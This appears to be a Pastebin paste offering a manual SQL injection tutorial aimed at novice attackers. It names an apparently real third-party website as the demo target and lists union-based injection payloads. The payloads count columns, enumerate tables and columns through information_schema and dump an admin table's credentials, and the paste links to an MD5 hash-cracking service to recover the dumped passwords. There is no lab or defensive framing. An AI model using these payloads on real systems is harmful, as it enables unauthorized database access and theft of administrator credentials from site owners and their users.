Advertisement
PSN_CR33P

SQL injection TuT for SPEDS/SKIDS

Mar 27th, 2019
148
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 1.14 KB | None | 0 0
  1. #########################################################SPED-SEC###############################################################
  2. # Title :  SQL injection Manual Tutorial
  3. # Tested on: [ Kali-Linux ]
  4. ######################
  5. # [+] DESCRIPTION :
  6. ######################
  7. # Demo :
  8. ========
  9. http://vikimobile.com/top-brands?bid=5
  10. ############
  11. # commands :
  12. ###########
  13. order by 100 -- -
  14. ============
  15. union select 1,2,3+--+
  16. =============
  17. version()
  18. ============================================
  19. group_concat(table_name)
  20. ------
  21. +from+information_schema.tables+where+table_schema=database()+--+
  22. ============================================
  23. http://www.waraxe.us/sql-char-encoder.html
  24. =================================================
  25. group_concat(column_name)
  26. +from+information_schema.columns+where+table_name=*****+--+
  27. ===============================================
  28. group_concat(***,0x3a,***)
  29. +from+admin+--+
  30. ===================================
  31. #####################################
  32. https://hashkiller.co.uk/md5-decrypter.aspx
  33.  
  34. ##################################################SPED-SEC########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement